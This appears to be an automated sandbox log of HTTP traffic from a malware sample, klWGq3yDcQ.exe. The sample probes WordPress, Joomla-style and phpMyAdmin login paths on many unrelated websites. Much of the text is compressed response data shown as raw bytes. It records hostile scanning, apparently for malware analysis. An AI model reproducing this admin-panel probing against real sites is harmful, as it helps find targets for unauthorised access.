                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    129192.168.2.45702866.235.200.147806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.495712042 CET232OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.826455116 CET533INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Set-Cookie: _cfuvid=CCSTuNw27vjAGhe0LambVrEDd4CnmWBK1UKexrI2tUk-1700978372739-0-604800000; path=/; domain=.tradeavenida.com; HttpOnly
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 82bfe7ec5ee438a4-IAD
                                                                                                                                                                                                    Data Raw: 35 33 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: 53<script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.826492071 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.925390005 CET363OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=CCSTuNw27vjAGhe0LambVrEDd4CnmWBK1UKexrI2tUk-1700978372739-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://tradeavenida.com/wp-login.php


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    130192.168.2.457011199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.495974064 CET247OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                    Host: www.gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.804783106 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Set-Cookie: publishedsite-xsrf=eyJpdiI6InZhbDJwVnlLUWhubGJIVTRxS1RyS3c9PSIsInZhbHVlIjoibEtHV0dCVjhVZFFxdXVPckRoandqSmJIM2VpRWo3WkE2ejZGY2pQbU5MVDEyaUwxT3czZzd6T2tYUFc2WjNmYm83eGJpaCtkTnU2eW1zMmcxN3N5eHJlbjdPL1drOGwyOUw5TjhsM0k1MnBoWDhYOHJucU5VWGN6Z3lZOC9qejUiLCJtYWMiOiJkYmI0NTNiNTQ5YzNhYzUxNjUyMDM2MWNlM2QzYzYxNGMyZTJhMWY2MzYyYWNiN2JjNzQ2ODI5NzJlMjU2MGQ0IiwidGFnIjoiIn0%3D; expires=Sun, 10-Dec-2023 05:59:32 GMT; Max-Age=1209600; path=/; samesite=lax
                                                                                                                                                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6IkxXaFVUaFNtTzd2ZGkvek9mQ0hvQmc9PSIsInZhbHVlIjoiZmhtK2lrVUlvZjdVZHpFVWVmMjR6b0VFRVYwWWdxaXNkRmpTQ202R0hubjNUM2czRThCblFXTXNOVjhQNC9kdS8yMmhialBBNGtpcW05eDZ0NDJzMGFDZ2VUemRuU2dvU01pdUNUdGEwc0wvUFRqdUt3MFl6RFlkblFaTWhZQy8iLCJtYWMiOiI2ZTM3MmEwZmUyNWQ5ZDgyYTFhNWQwMDg4OWNkNTdlNmI5ZDJhZmM1MzcwMzM3NDgxZjBlNDI5MTllNTVlN2VjIiwidGFnIjoiIn0%3D; expires=Sun, 10-Dec-2023 05:59:32 GMT; Max-Age=1209600; path=/; samesite=lax
                                                                                                                                                                                                    Set-Cookie: PublishedSiteSession=eyJpdiI6Imo1aVN2WVJmWnBrNnZqSXJrYXFoblE9PSIsInZhbHVlIjoidVNWYlV1bDRTdmFsRnQ0anV4Zy9kK3RTUXdEQVFwV1I5OXo1Z0hKUTBWbWxoeFNDUGEwM3F0d
                                                                                                                                                                                                    Data Raw:
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.804816961 CET136INData Raw: 59 32 64 32 39 70 5a 46 5a 6f 5a 6d 35 47 51 55 6c 6f 57 55 52 49 55 57 31 53 52 55 6f 30 61 48 51 35 52 79 38 78 54 45 68 55 65 6a 52 77 59 6e 64 50 4e 56 6c 47 53 44 64 74 62 58 5a 4d 55 6b 78 56 62 6a 63 77 4e 6d 78 51 54 56 70 4b 53 6e 56 31
                                                                                                                                                                                                    Data Ascii: Y2d29pZFZoZm5GQUloWURIUW1SRUo0aHQ5Ry8xTEhUejRwYndPNVlGSDdtbXZMUkxVbjcwNmxQTVpKSnV1
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.804824114 CET440INData Raw: 64 56 5a 73 51 33 42 35 61 6a 5a 6e 4f 54 6b 69 4c 43 4a 74 59 57 4d 69 4f 69 4a 6a 5a 57 55 33 4e 54 51 34 4d 57 49 77 4e 7a 55 79 4e 44 45 35 4d 44 51 33 4e 57 5a 6a 4e 47 59 33 59 6a 59 77 4d 57 4a 69 5a 6a 4d 77 4e 7a 6b 34 5a 44 5a 6d 4f 47
                                                                                                                                                                                                    Data Ascii: dVZsQ3B5ajZnOTkiLCJtYWMiOiJjZWU3NTQ4MWIwNzUyNDE5MDQ3NWZjNGY3YjYwMWJiZjMwNzk4ZDZmOGU2ZjFhYTNkNzA5N2RkOTgwNzBlMmJiIiwidGFnIjoiIn0%3D; expires=Sun, 10-Dec-2023 05:59:32 GMT; Max-Age=1209600; path=/; httponly; samesite=laxX-Host: blu73.sf2p.inte
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.804830074 CET686INData Raw: 32 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 85 55 db ae 9b 30 10 7c cf 57 b8 54 7d 0b 01 4a ce 89 44 49 a4 f6 a1 ea d3 51 d5 3f 30 78 09 6e 8d 8d 6c 13 92 56 fd f7 ae 21 84 4b a2 94 48 21 f2 da b3 33 bb e3 4d fa 8e a9 dc 5e 6a 20 a5 ad c4 61 95
                                                                                                                                                                                                    Data Ascii: 26cU0|WT}JDIQ?0xnlV!KH!3M^j a/"[m%>N@%_U#Y~a=gx=qk)v!n=%ciOHE2nP$Uk,)yy*o@beE EBy<tlwGA


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    131192.168.2.457041185.183.156.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.547843933 CET228OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: federwild.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.734946012 CET947INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Last-Modified: Thu, 12 Sep 2019 15:06:38 GMT
                                                                                                                                                                                                    ETag: W/"3fe-5925c7bf8c9e3"
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.736623049 CET268OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: federwild.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://federwild.at/wp-login.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.925234079 CET947INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Last-Modified: Thu, 12 Sep 2019 15:06:38 GMT
                                                                                                                                                                                                    ETag: W/"3fe-5925c7bf8c9e3"
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    132192.168.2.45705874.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.560147047 CET276OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://himontessori.com/wp-login.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.750559092 CET495INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://himontessori.com/wp-admin/
                                                                                                                                                                                                    Content-Length: 242
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://himontessori.com/wp-admin/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    133192.168.2.45714576.223.26.96806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.614989996 CET275OUTGET /phpMyAdmin/?subid1=20231126-1659-3187-9499-03d21ba245df HTTP/1.1
                                                                                                                                                                                                    Host: ww38.ondania.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.852514982 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_GzAUKIn69XAEZ8brUpex8fYZa6JYxIkyWMVvyOWzasuufUosTXkUM1US05efyefb5wZT6vGhXzBo5kyU6Q7/0w==
                                                                                                                                                                                                    Accept-CH: viewport-width
                                                                                                                                                                                                    Accept-CH: dpr
                                                                                                                                                                                                    Accept-CH: device-memory
                                                                                                                                                                                                    Accept-CH: rtt
                                                                                                                                                                                                    Accept-CH: downlink
                                                                                                                                                                                                    Accept-CH: ect
                                                                                                                                                                                                    Accept-CH: ua
                                                                                                                                                                                                    Accept-CH: ua-full-version
                                                                                                                                                                                                    Accept-CH: ua-platform
                                                                                                                                                                                                    Accept-CH: ua-platform-version
                                                                                                                                                                                                    Accept-CH: ua-arch
                                                                                                                                                                                                    Accept-CH: ua-model
                                                                                                                                                                                                    Accept-CH: ua-mobile
                                                                                                                                                                                                    Accept-CH-Lifetime: 30
                                                                                                                                                                                                    X-Domain: ondania.com
                                                                                                                                                                                                    X-Subdomain: ww38
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 31 37 33 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 6b 77 da 38 b7 fe 3c f9 15 2e b3 4e 20 e7 e5 66 08 b9 93 1e 52 92 34 69 21 4d 42 ae 5d 73 ba 8c 2d c0 c1 d8 8c 6d 02 a4 6f ff fb 79 b6 24 db 32 90 ce 74 de 99 7e 3a 74 4d c0 d2 96 f6 96 f6 45 fb 22 cf c1 9b e6 c5 bb ce c3 a7 63 6d 10 8e 9c c3 b5 03 fa d2 2c 23 34 0a 86 d5 75 3c 73 38 64 f3 7a a6 75 32 9d 36 2f 1f ce 3f 78 8f 67 83 67 b3 dd b8 3c 3e 3a ba 6c 34 af a7 8d e9 75 e3 fc a8 f1 f1 f7 49 f3 e4 b8 73 7f e5 96 df fb e5 5a ef e6 d3 f6 f1 79 67 7b 7b f6 e0 7e 1a 5d 75 c7 ad f9 e6 f3 70 e7 c3 83 fd de 1d b6 c7 cc 72 9f 2e 1a ed 73 d3 b8 6f de 9b 1f 2e cf db 65 f7 fe c3 e3 f9 c7 ed 8e 69 9f 37 77 1a de fb fb 0f 7a 6d e7 5d 63 7a dc 68 5c d6 eb 5f 4e 5f 1a 37 1f ce dc ad dd fb c6 f1 e3 4e d7 bf 19 b3 d9 4e ef e1 d1 d8 3a 7f 98 9d 0d e7 77 ad db e7 f9 c5 dd 8b 11 4c 26 bd 1b 2f e8 dc 0f 6f 5a fa cd 75 b9 c6 7a 73 d6 eb d6 a6 8f 9d ad e7 d3 c1 fd cb 91 57 1b ce 6f b6 2e b7 4b e5 69 bd 9e d1 66 23 c7 0d ea 99 41 18 8e f7 4a a5 e9 74 5a 9c 56 8b 9e df 2f e9 bb bb bb a5 19 ed 07 07 da 73 0c b7 5f cf 30 37 a3 c5 bf 68 bf 98 61 1d ae 69 f8 1c 8c 58 68 60 1b c3 71 81 fd 3e b1 9f eb 99 77 9e 1b 32 37 2c 74 e6 63 96 d1 4c f1 54 cf 84 6c 16 96 68 de 7d cd 1c 18 7e c0 c2 fa 24 ec 15 76 32 25 75 22 d7 18 b1 7a e6 d9 66 d3 b1 e7 87 ca f0 a9 6d 85 83 ba c5 9e 6d 93 15 f8 43 5e b3 5d 3b b4 0d a7 10 98 86 c3 ea 7a 5e 0b 06 be ed 0e 0b a1 57 e8 d9 61 dd f5 e2 b9 43 3b 74 d8 a1 e7 5a 86 6b 1b 45 d3 1b 1d 94 44 93 58
                                                                                                                                                                                                    Data Ascii: 173b\kw8<.N fR4i!MB]s-moy$2t~:tME"cm,#4u<s8dzu26/?xgg<>:l4uIsZyg{{~]upr.so.ei7wzm]czh\_N_7NN:wL&/oZuzsWo.Kif#AJtZV/s_07haiXh`q>w27,tcLTlh}~$v2%u"zfmmC^];z^WaC;tZkEDX
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.852533102 CET1340INData Raw: f9 9f 64 41 a2 11 6b 6b 6b bf 1c 08 25 10 41 a9 8c d3 cd 22 b9 40 08 18 10 59 4e 79 64 28 80 10 13 d2 89 00 7d 18 21 34 cd 68 21 42 6f 19 71 3f 19 cf 86 00 52 62 55 29 42 24 6c 31 b5 50 35 21 51 49 cb e1 da 2f bf fc 72 80 e8 de 67 3d 91 2b 08 64
                                                                                                                                                                                                    Data Ascii: dAkkk%A"@YNyd(}!4h!Boq?RbU)B$l1P5!QI/rg=+d`14aB&+)5h@?0y.H,Jy-nCh2DC/ZPZ@[$U@y%+9[h~DS-4)XY0V658Ev<3
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.852546930 CET1340INData Raw: 43 60 fa f6 38 d4 02 df ac 67 c4 6e f4 3d af ef 30 82 2c 19 56 c0 dc 80 95 2c 6f 64 d8 6e 50 32 8d 5e f1 29 78 6b 74 c7 75 3d 73 78 50 12 83 0f f9 66 04 e1 dc 61 da 88 59 b6 51 cf a0 83 61 e3 0e d7 8a 46 80 e5 7e 09 42 c3 2f 6b 5f d7 7e e9 1a e6
                                                                                                                                                                                                    Data Ascii: C`8gn=0,V,odnP2^)xktu=sxPfaYQaF~B/k_~{&JVugowgxc.KXP%>Oo|6fFs7gOB<Vecae.kT"H$DvwH~l"6vqe4cm
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.852561951 CET1340INData Raw: ae a9 5d 45 ee fb 45 bd c5 b1 ef 85 1e f4 51 fb 97 86 a2 45 16 5f 71 d7 c0 0b 42 f5 79 0c 52 29 9e 43 5b 2e 06 12 82 aa bd 4d 86 c9 16 cc b7 9e d5 a0 d3 6f 91 ec c2 c3 97 99 d1 7b f6 eb 8f 77 57 d8 da d6 bc 55 79 a8 5e dc dd 8e 5a 4d e8 c4 cb d1
                                                                                                                                                                                                    Data Ascii: ]EEQE_qByR)C[.Mo{wWUy^ZMOoK{ts7z{-{miwH>Rz>.};n89:dN[MWv<Yd1HRU. *JlmdOx6F-@.@
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.852575064 CET1340INData Raw: 39 15 7f 79 c9 89 bb b9 bc 5c 1e a2 29 47 64 b2 5e de 03 71 c6 82 7f fa 7a 51 b9 fe cf 96 9c 70 19 29 ec 42 41 13 17 4c a1 98 bc 9e 97 12 81 05 17 67 91 a9 ca c1 d5 83 72 2c 76 93 5c fd 73 02 4f 18 d7 e9 cf 6b f6 42 da 4c 41 d9 5f 38 ab 22 b5 a0
                                                                                                                                                                                                    Data Ascii: 9y\)Gd^qzQp)BALgr,v\sOkBLA_8"6GefPap]R^qavG}&XbU'z\O]GGh9[[Tqu|~LQD|{.uV|X3z~jHq1
